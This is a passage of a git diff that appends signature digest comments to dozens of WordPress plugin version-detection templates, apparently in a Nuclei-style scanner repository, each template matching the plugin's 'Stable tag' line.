4b0a00483046022100cba781039c22f41e713116c83f4ef540267648ffc1941604d100b6460d155f25022100a54ad7e4531d2f685faaa31197eb1aac01a1db8f5a7f6f6af038a110fa5f0a17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..8cfa2f63ee 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022028908df64d13e5d125206ac465c211ea5d646911950b9ee54dfb1c394e1181bf02207c695ee1849d0186b027fa1ff263a43c5d1becfa44ab6f6b65dcd0978f0ef09d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..ba6cd4401e 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c2ff2e50a1ab629c5c8fccc749a4a45779fc2fac72fb3456625d1632d36760fe022034f2adc59f2f061fba5c4a29ede80a17c505eace40adf537ab740b2799d3311f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..4a837ba8e6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207be1adf4a5e154a19a5dfdbccc98b8ee137e1fc2ec988153ce37fb9eea23e838022100ff82f689beece49e3b10d440b4dfd1b4682c3e6b8fdb30c49029bc8e81159dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..a42057f774 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d4c9ddb785129cf61fcb504ac2538176b3186ccdd47be66d5e87b63662d32ff0220680519ea7db205ec60b991d7b504c5cd94e64dcaa02889bfa738520594033cea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..3f076d71e4 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100865e5032bedc59d29b10c3c541c9fcc4d0dda7d92cfd2f50585b96cac046a064022100d27168155421caeae7974d498478173cf4558216795509761c2876402d68785b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..3acb8b1f06 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205244cecd15814731962766d6f62c64eb754bf78b4ddbd70b8cb6e2fd8a54d67202203842035c4a56ba05e9c3434923757b67220e6da38e3b75bc8c2432031c2db039:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..9c488619c7 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100db799abb7c2e1e7cd3dadf01275e556fdab49e567d04bbb6b254eaad9fc113f502207042a0bf1df538fb071dad8a2bfe30ef41782ef1a78e0ea036589f9be48ae19d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..aeed8920a5 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220719ffa2a7aca8fe57c0051eddba61eaa253fe371d7dad7ec5b57b3718a9fa309022062dda36595fdbab931b07e88076e0e50a8733b511f5cde7172ba79e576a7e1e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..ed1d901a27 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220420c6ec2d6cf1c5c634f9f749d917ea10de98f22490682087308b1f3b9b5cec902210093e3bf5a99e70f3eedcabbffc8e882f75548489087f0d84d1fc2abc023dc7544:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..9eeba8af9d 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210095a6d9af790972ba2807a3b0c58d8ef28bd972f704ba2ba11bd196ea9f0e26ae022100f3f30ee49985e9683d60ae68ee2903799104da1d2eb60a26cc4f0bc74d2ca93d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index b509d8cc67..39a1a332d0 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040a7612590080426e9af9d776cbb18d386530fe2dcef8f802d947b556a13f4f202206ad5e7af5b1f2dfc2e0e688118e5b70850add62abf1beebe1f522b0b1bc4fd0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..90e70a4ee7 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e7a8853d556a942ce4e058925d5fb8161cbaa706ccfcff35b4fa6d5b29ecd2e5022100c25c503ebdf1466a898fdb195e40f9b4710e0c53f82b4c2c4f14d37b6c409a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..74f828d1ce 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f05dbe26e23b4276654e5b86a0339d0340095a8358cfaba64fecccfdc0d0c2d50220728b0effcc95b87b57c3e2fe31caa2f5b1a2cb879c484e4ba7a4382e822491d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..3416043f79 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008e721bf2bf97f3c15a4bc84ff4a15737175f0356e200d12db1cecc3fffa28bc70221009432e8c4fe3711a27ea56825165f3d21d22bc096e37de2618095e82372cf90f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..78bdab58ba 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220698db8e76bc40e03debce6b3fbba5fa5cad53f49a752c54bd0d10675959444a302200df373f653a0577f25f4185644b853afccad0a3504a92a63a628a566b83ab5a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..bcea1ef612 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008a7d10893986de2958063163b1ab8a92d3f2a6c661d75952237ee1ffebb6ab77022100bf23eb30925a20da19715c6d2b33983fc5e43245e3abd316d5387adec0a7e18c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..fcba944a17 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022062de9dc4000d52aec452c3677460b1227eea52114aa05dfa9da6ce3466d2ec27022100e6982ef37fdefc602580575d64d9b01e78e8c239c96cab76b57c17cb5c1cd629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..15a2337499 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203e71ed8c6317a30d8b89f8e5a412bcfe73b0424a8b74c48bc7af681c5ee5a1dd022100e8d3343b47b6a14039c47648253d543ecaae48bd84cc4e7f939b2f49af1de64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..ae953396da 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204cfe6a9402f7f884e905f76490378cec6f3dbbb9291596eed47574cddbad511a02210086f05086f76f6c25cb091b648008db50b151fa090d620456d883463825123374:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..93e73a785f 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c16487464c5c9c01b954638defd0280e65292c9de4520891d019bb6476b49da02201f2c8b7cd3fd910e167f6b7b5533bee8a745fc556c43c3c3093af3f8c4f2c1a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..c23218da9e 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f7be0513214a48681afd3c65ee461b90639e4890d7201dbbc39f6684b78c47a2022047a69093f6b2f1a9cfb4e15890fdb2c80ba303943f8c8442914b4110802cb3bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..7fdcddd3a8 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008e15818f92162a1e3b86ec98c4d894d3da95141b8daf0c2d40521a464dee293802210097bb24dc58254a87d4465ab10b53d49822ebe7b683fa21be02082a26f9241939:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..c667b97ffe 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022079d0d3618efff8eb75c3a339ac2efdca7d12801aea463090c89d982e84ab616902201cfc957c29d02ff6e468b463161ae8caf5123c40296d0a9eaed1fc854da1a505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..ca02178a0f 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d55f2b59c1381d955741591ba5476aeaf4a58c640f2d2d17f1d3e2bddea50d7022012540101012e0127beb51990a96a7f4a603d25e50e5b567f5b50eabc42c6620d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..f9d9d1ffbe 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066c6baafe4487fc7506a70b678bfcb5ed4a13fcbfa8fd92b16148e626605f88702210085fe83e80a7350588c56d5be83fdaf7b81846d8273404dcb4a0321c2353447f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..738c6799b9 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d6dcb47098f57becab0253d1de39526742a01a6bb8532f763c626b0befd9c35c022100df459fa303f3045fd2dd15dedbbba24c017d258ec928c65bbe2184b40729ec57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..a9ba8fa30a 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7d2d588a049961aa26b2fb001d68d39adb77716c0a53bb3f1c6b4ac7e6f5b5b022068df10da1a95290525d570a61c4833b1310409aa1785bd6c6c0cdf423783883b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..78b1d8c1b0 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b82a3c7302845e5c8a6c1e0c222fee82b7839bb0ef77c2f03a03ca46e6835562022100f3989459e66ed28802742ce9ffeab76683db7b00866f5e898e646406552d2387:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..372df25a94 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022043d260d6701acf276c826e9727ffb6c0c708b5bec5633ebdba781f4283e7b7ca022100d8e299d53f03127ba5e7322698deff5d07dcaf05fded73f54fea075dd5a40938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..eccee81d31 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cd1e812223a8204a0d3f4d034dff04de7c4a830739fbfabb2d094f5b6aeb2cac02204278d107483917f964cc2c608ba1d4a4f7c049f21800dc872b44abca57a41628:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..f066dbc263 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203908921dd63f0c3b8b0b052095c51501068f6aaafee3256afee15c534d2f2a2d02204338900b43ba862f4afda5783f1d35b2c23ef1a53336a88113765a9e05389675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..04ef26e344 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100970f90c26de651cfbb0e0bed51fa8278d201794323baa7727246d86f8f6503430220047b7c0a393496bae33d59a894728b056a23e0f82d7aee680f62a0322e72dcae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..06aef02b50 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cbab21ca57b50a62339be9bc6b67171f45365c404e85d48cbff787465f66b669022100dee9f7872098e57881c1b6943c572ce2c198babb76a77c806d9e5797ab6bf929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..b33a785120 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b756950fb56eb15221139529dde4c861003db5b2075a08d990145ca80d95d76a022100a422fe4c06a0ac02bf8c8fb2c9ad16cedaa82cb37b94c0c858577d319041c4e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..2ad4c35356 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009df9789f1b555a8714fb9a7c768d5b3e6fae38ff45cd8f8b13f5257999851f6002204fe7592a17ea4aee011b658d930a3c18935a0f18547ad7d68674e107876ce987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..53ea716abc 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100994efcbb37ce1c2de94f63005e85ab48bc863ca77d36b6ef6037bbe54339ceb00220697af6739380be4e640ecb6ea889003801c6dabf937f07cc87185c11a08b3bf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..79aa87d5cc 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008bd9d821845cab18ea9958071ed577bac944f3ea14a6b442fc4e0355b15ebdfe0221009b38377f12639cc62d78687c843f608a75640307a899f71ff0fb33ada9495904:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..8b83097f11 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200f062c8c21d801b6e458f810f6a23c5b284758c064a803298b4e16db69a2e826022100839b37f77221148ba032b120d0ac72e21f0fb6ed3d56093c3a2784eeeb802968:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..2a36057c4e 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100feccfe7deaa6ef67cbfc26f8d69cb10acd579d0e3c7fe8c30fb780c0754fa56b022024403b5d90b0945fa875b715d4f72c39e4f3da59a67598a70fb79b1c15ec171f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..470c152e5d 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ec5d9fd9c984d29e05cce71bbab8b064f8b04e2527deb81d63b45d4dae1a1a0602202113477c99822825a17bd7f730e7ebb799ab7374ae5145ce2ae1e5a37093aca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..0374746363 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eaa110d046cc84ca2d10f22b8fb398e3036adb436617794d0c15777d42bcbc55022100e275507af9b6aaa03620f369625dc194347af7256d06bdb44db86e28c676c551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..47b413eed1 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022028b8ca74677a8dfb79e0a2aa0d35503dd49bcdf1a5700cde3d0d25ff5fbde8e1022068a51322766afe60f514fb7e0ec62163cf01d1b045fe774231ea8785b1e754f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..d050a4758d 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d9b2b4aa04dfd899677bc62b2f4e614ce2e78b04c7906b47d1dbcab8d5589094022100bfb23e6c0ae40f07bd35cb1ed0b2b897ae57729b01a1b5da3181644e74d4a5d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..e2c3e31121 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028aa5323bcfc5e895237265b9ef8cccd744cf8bc6b81387d12a5d477c9fb30bb022100b20ed07be9e67afc9ef9914f532885ffc9d77e5a422db16d0959711f2c35cf9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..933c9a58cc 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d72511317c0d8f0a10c122bc0eff86a4dd6fefc85c5d28b659aee51dfba1071d022100b50687b2ac0b44ed0fb132e75eb9879f6bcd93d18d71acf4da46bb5c51874346:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..0254a51c3f 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f3c54ae5c5318e8210ee141f2e73021e3adf2a8a5705ce2b5ff18c392d0d748a022100f165a1d934aa4f785e508f486a7700c17300674114e770c8014b0bf061b7e5bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..fdc8369f81 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - 